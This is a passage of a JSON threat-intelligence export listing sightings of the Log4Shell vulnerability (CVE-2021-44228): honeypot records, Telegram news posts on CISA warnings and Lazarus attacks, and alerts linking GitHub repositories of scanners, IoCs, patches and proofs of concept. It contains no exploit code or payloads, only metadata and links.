"creation_timestamp": "2022-06-23T22:28:46.000000Z"}, {"uuid": "cbad3365-9911-44cb-af61-6c488fe0204a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BleepingComputer/12484", "content": "CISA: Log4Shell exploits still being used to hack VMware servers\n\nCISA warned today that threat actors including state-backed hacking groups are still targeting\u00a0VMware Horizon\u00a0and Unified Access Gateway (UAG) servers using the\u00a0Log4Shell (CVE-2021-44228) remote code execution vulnerability. [...]\n\nhttps://www.bleepingcomputer.com/news/security/cisa-log4shell-exploits-still-being-used-to-hack-vmware-servers/", "creation_timestamp": "2022-06-23T20:15:25.000000Z"}, {"uuid": "4b9de992-d0d3-4ecb-924c-df956a73deec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1317", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis work includes testing and improvement tools for CVE-2021-44228(log4j).\nURL\uff1ahttps://github.com/sdogancesur/log4j_github_repository", "creation_timestamp": "2022-01-13T21:35:40.000000Z"}, {"uuid": "a146b5d1-1b49-40a3-a711-ad3f6a0dc064", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1294", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1a\u041d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043c\u043e\u0434 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228\nURL\uff1ahttps://github.com/LemonCraftRu/JndiRemover", "creation_timestamp": "2022-01-08T19:30:36.000000Z"}, {"uuid": "dfe34133-8150-4771-bd87-475c7fd676f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1316", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/eliadbz/log4shell", "creation_timestamp": "2022-01-13T20:31:47.000000Z"}, {"uuid": "911ea9d4-7199-4eb8-83bb-9e51f27bd359", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-14)", "content": "", "creation_timestamp": "2026-04-14T00:00:00.000000Z"}, {"uuid": "ef28bbe6-d094-4edc-b05b-09c6c1aad159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1418", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/ThanhHien98/Log4j", "creation_timestamp": "2022-01-27T04:07:59.000000Z"}, {"uuid": "d256bf99-3bc4-4878-8067-ccc70d259a0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/filippo.abyssdomain.expert/post/3mjklsutb6s2j", "content": "", "creation_timestamp": "2026-04-15T19:08:43.878035Z"}, {"uuid": "1c3c17ad-fb7e-45bc-aded-43f37b34ddf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cybred/330", "content": "Merry Christmas!!!\n\n\u0412 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 log4j \u043f\u043e\u0434 Apache \u043d\u043e\u0447\u044c\u044e \u0432\u0434\u0440\u0443\u0433 \u043d\u0430\u0448\u043b\u0430\u0441\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE). \u041a \u044d\u0442\u043e\u043c\u0443 \u0432\u0441\u0435\u043c\u0443 \u0443\u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0439 PoC, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 GitHub.\n\n\u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC \u0443 \u0434\u044b\u0440\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u043e \u0434\u0430\u0436\u0435 CVE (\u0441\u0435\u0439\u0447\u0430\u0441 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c - CVE-2021-44228). \u0418\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043a\u0443\u0447\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 - Steam, iCloud \u0438 \u043f\u0440.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0443 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Apache log4j \u0432\u043f\u043b\u043e\u0442\u044c \u0434\u043e 2.14.1. \u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0443\u0436\u0435 \u0438\u0434\u0435\u0442 (\u0441\u0442\u0440\u0430\u043d\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u0436\u0438\u0434\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e PoC).\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043c\u0435\u0440\u044b \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044f \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c log4j \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0-rc1, \u043d\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0447\u0430\u0441\u043e\u0432 \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u0431\u0445\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0435\u043f\u0435\u0440\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0434\u043e 2.15.0-rc2. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c log4j2.formatMsgNoLookups \u0432 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 true.\n\n\u0422\u0430\u043a\u0436\u0435 LunaSec \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043a\u0438\u0442\u0430\u0439\u0446\u0435\u0432 \u0433\u043e\u0432\u043e\u0440\u044f\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 JDK \u0432\u044b\u0448\u0435 6u211, 7u201, 8u191 \u0438 11.0.1.\n\n\u041d\u0443 \u0430 \u0432\u0438\u0448\u0435\u043d\u043a\u0430 \u043d\u0430 \u044d\u0442\u043e\u043c \u0440\u043e\u0436\u0434\u0435\u0441\u0442\u0432\u0435\u043d\u0441\u043a\u043e\u043c \u0442\u043e\u0440\u0442\u0435 - \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Minecraft \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 1.8.8. \n\nApache Foundation \u043f\u044c\u044e\u0442 \u0432\u0430\u043b\u0435\u0440\u044c\u044f\u043d\u043a\u0443 \u0438 \u043c\u043e\u043b\u0447\u0430\u0442.\n\nMerry Christmas, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-10T11:08:40.000000Z"}, {"uuid": "c4cfe687-94c7-425d-ba28-4208cd2eb345", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-15)", "content": "", "creation_timestamp": "2026-04-15T00:00:00.000000Z"}, {"uuid": "a0527541-472b-42cc-b0f3-501c4d601585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/QWtMspw8b5rHX0DeurfH2ahOLlTAGq6gxta8BKQby_9_Qi0", "content": "", "creation_timestamp": "2025-11-18T18:55:32.000000Z"}, {"uuid": "2fa96a17-6167-43f5-898f-70031209d733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "06db86ac-45f3-453d-ba2d-a7725173d149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "3186ae8e-4651-49ed-ae38-b26bb3dbf94f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-18)", "content": "", "creation_timestamp": "2026-04-18T00:00:00.000000Z"}, {"uuid": "c9dd49d6-0170-47b4-8b72-02339b3ae7c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-19)", "content": "", "creation_timestamp": "2026-04-19T00:00:00.000000Z"}, {"uuid": "85358c09-1e46-4329-bfb4-f141805783ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-21)", "content": "", "creation_timestamp": "2026-04-21T00:00:00.000000Z"}, {"uuid": "cf23833a-9ddf-4c93-abaf-3f8a96e45bcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "MISP/4d26c5b0-4bc5-443c-8641-553684788bdc", "content": "", "creation_timestamp": "2026-04-19T22:45:30.000000Z"}, {"uuid": "996f4e4f-8ca1-48b7-a9eb-1b591adff361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-20)", "content": "", "creation_timestamp": "2026-04-20T00:00:00.000000Z"}, {"uuid": "7eec80fd-8fbf-4118-9b5d-4b94add67fa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-20)", "content": "", "creation_timestamp": "2026-04-20T00:00:00.000000Z"}, {"uuid": "1d2561c8-4921-4130-b038-5cdadb2499b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-22)", "content": "", "creation_timestamp": "2026-04-22T00:00:00.000000Z"}, {"uuid": "733615a5-fcaf-4739-990c-05076bc63d43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/mehmetakifozdemie.bsky.social/post/3mk6slgr2fg2x", "content": "", "creation_timestamp": "2026-04-23T20:03:05.551746Z"}, {"uuid": "99a975c9-acca-4843-b1d9-785580988294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/Digital_Forensics/199", "content": "Apache Log4J most recent vulnerability (2021-12-11).\n\nhttps://www.docker.com/blog/apache-log4j-2-cve-2021-44228/\n\nhttps://github.com/YfryTchsGD/Log4jAttackSurface\n\nhttps://t.me/Digital_Forensics", "creation_timestamp": "2021-12-12T06:44:32.000000Z"}, {"uuid": "4fbb72dd-a176-4bbc-85c8-a7f7ab55b96c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/secmedia/84", "content": "\u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0421\u0428\u0410 \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u043e \u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0435 \u0441\u043a\u0430\u043d\u0435\u0440\u0430 \u0434\u043b\u044f \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f web-\u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0434\u0432\u0443\u043c\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 Apache Log4j (CVE-2021-44228 \u0438 CVE-2021-4504).", "creation_timestamp": "2021-12-23T17:37:07.000000Z"}, {"uuid": "85884e22-f03a-47f2-84d0-0090a94a7e52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-23)", "content": "", "creation_timestamp": "2026-04-23T00:00:00.000000Z"}, {"uuid": "4f9295ce-8a96-4a3c-b730-4c061ce4a8ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/EYkASGxj3Tiuz3kIHRMz13gpRd2GwQ5wKmXB5D8I7ZTChs4", "content": "", "creation_timestamp": "2025-07-23T21:00:04.000000Z"}, {"uuid": "f656fa5b-c9d5-4a5d-96ca-549b710f41b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ckuRED/77", "content": "Interesting thread on RCE in Ghidra via log4j (CVE-2021-44228)\n\nhttps://twitter.com/zhuowei/status/1469511822411767811", "creation_timestamp": "2021-12-11T18:16:51.000000Z"}, {"uuid": "15f83556-30d7-411f-a7d6-34415e542e25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/945", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPublic IoCs about log4j CVE-2021-44228\nURL\uff1ahttps://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs", "creation_timestamp": "2021-12-11T14:58:24.000000Z"}, {"uuid": "3ae216c8-4a90-446d-a121-8651dea7ccd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ckuRED/84", "content": "CVE-2021-44228 aka Log4shell summarized.\n\nhttps://m.youtube.com/watch?v=w2F67LbEtnk", "creation_timestamp": "2021-12-17T16:53:28.000000Z"}, {"uuid": "c5d09767-e998-4e32-b367-2cbc45c77ef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1086", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aHot-patch CVE-2021-44228 by exploiting the vulnerability itself.\nURL\uff1ahttps://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch", "creation_timestamp": "2021-12-15T12:13:54.000000Z"}, {"uuid": "6b770f75-d63f-44e7-86f0-bd3ccd8553c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/5791", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aLog4j Vulnerability RCE\nURL\uff1ahttps://github.com/LucasPDiniz/CVE-2021-44228\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2023-11-13T16:58:50.000000Z"}, {"uuid": "17ffe4bb-3980-4e2e-ad6a-2edfa18c9aff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6204", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aResearch on CVE-2021-44228 and CVE-2023-46604\nURL\uff1ahttps://github.com/dcm2406/CVELab\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-12-16T12:06:44.000000Z"}, {"uuid": "8685ad5b-3239-49ed-b150-0289e3c25a7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/QVvFPeHcO_ZrMwVaFo1uhjDTZRvYrKaEOPoiNmt5Stzg9hE", "content": "", "creation_timestamp": "2025-11-05T21:00:04.000000Z"}, {"uuid": "476ec99b-2522-4252-ba02-f8a671ec8924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/975", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPublic IoCs about log4j CVE-2021-44228\nURL\uff1ahttps://github.com/authomize/log4j-log4shell-affected", "creation_timestamp": "2021-12-12T14:37:21.000000Z"}, {"uuid": "fe1da524-800f-439e-88e4-52c6095d800c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/4zq_XAKfBKLeh8gHSvSvrJArlLI6vLMywbvNDmyrYFeYnXc", "content": "", "creation_timestamp": "2025-11-17T03:00:07.000000Z"}, {"uuid": "c2d3ee92-a07d-4339-9fa5-cd0367bbca10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1156", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it\nURL\uff1ahttps://github.com/suniastar/scan-log4shell", "creation_timestamp": "2021-12-18T11:20:46.000000Z"}, {"uuid": "07b39887-c525-4c58-a995-3d1ea42ad821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1206", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell(CVE-2021-44228) Demo with AWS\nURL\uff1ahttps://github.com/BabooPan/Log4Shell-CVE-2021-44228-Demo", "creation_timestamp": "2021-12-22T03:38:53.000000Z"}, {"uuid": "0baa9a39-c460-4106-980b-d9035c9e655a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/NQOCep9JXuunt-IAyUJYpZHdpB1OmZjsgFCnwZQxWJWW2jY", "content": "", "creation_timestamp": "2026-04-10T09:00:05.000000Z"}, {"uuid": "b77b550b-9187-4cc8-a8d5-519ce8b492f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/noobhackersyoutube/1596", "content": "#Blue_Team_Techniques\nBackdoor detection for VMware view post Log4j exploitation (CVE-2021-44228)\nhttps://github.com/mr-r3b00t/CVE-2021-44228", "creation_timestamp": "2022-01-06T06:20:20.000000Z"}, {"uuid": "8436dc8d-2b1f-448e-a4b7-2f8a85318fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-24)", "content": "", "creation_timestamp": "2026-04-24T00:00:00.000000Z"}, {"uuid": "323b3031-ede4-45f4-8ba0-f05f0256f516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/p9aXpoU_FZfvPwaFGC2z6wToIKsj9JEw53i6nfBS-Wl44_8", "content": "", "creation_timestamp": "2025-10-28T21:00:05.000000Z"}, {"uuid": "9bba8e96-078d-4565-b5d5-e3c1298aaeb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6266", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aInstructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604\nURL\uff1ahttps://github.com/dcm2406/CVE-Lab\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-12-21T18:27:16.000000Z"}, {"uuid": "0980f2c4-c23c-43ea-9e7d-aaefc53557e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/itsec_news/684", "content": "\u200b\u2694\ufe0f \u0421\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0446\u044b Lazarus \u0430\u0442\u0430\u043a\u0443\u044e\u0442 VMware Horizon \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell.\n\n\ud83d\udcac \u0421\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Lazarus \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 